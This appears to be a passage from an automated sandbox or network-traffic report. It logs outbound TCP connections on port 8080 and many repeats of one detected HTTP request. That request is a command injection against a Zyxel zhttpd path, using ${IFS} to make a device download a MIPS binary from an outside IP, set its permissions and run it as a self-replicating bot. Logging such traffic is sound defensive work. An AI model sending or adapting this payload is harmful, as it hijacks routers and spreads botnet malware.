            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 32.100.167.81:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 145.135.116.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 124.11.1.102:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 20.169.233.4:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 66.240.182.132:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 99.143.195.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 150.96.193.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 17.54.103.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 150.40.76.16:8080
            Source: global trafficTCP traffic: 192.168.2.14:12028 -> 119.62.65.89:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
